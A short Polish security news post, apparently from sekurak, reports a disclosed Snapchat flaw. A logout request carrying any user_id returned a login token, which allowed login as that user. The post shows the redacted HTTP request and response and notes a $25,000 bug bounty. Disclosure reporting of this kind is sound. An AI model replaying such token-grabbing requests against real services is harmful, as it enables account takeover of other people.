Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Snapchat: można było się zalogować na dowolnego użytkownika, znając jedynie jego user_id (podatność warta ~100000 zł)
Szczegóły możecie zobaczyć tutaj. Samo wykorzystanie podatności było banalne: najpierw wylogowujemy się (z listingu usunięto nieistotne w kontekście tekstu nagłówki), podmieniając user_id na ten ofiary. W odpowiedzi HTTP otrzymujemy token.
POST /scauth/otp/droid/logout HTTP/1.1
Host: gcp.api.snapchat.com
{„user_id”:”████”,”device_id”:”███████”,”device_name”:”███████”}
HTTP/1.1 200 OK
{„status”:”SUCCESS”,”user_id”:”█████████”,”token”:”█████”,”expiry_hint”:████}
Teraz wystarczyło zalogować się, podając dodatkowo w żądaniu zdobyty token i … byliśmy zalogowani na użytkownika o user_id, który wybraliśmy w pierwszym kroku. Badacz za zgłoszenie podatności otrzymał nagrodę $25 000.
–ms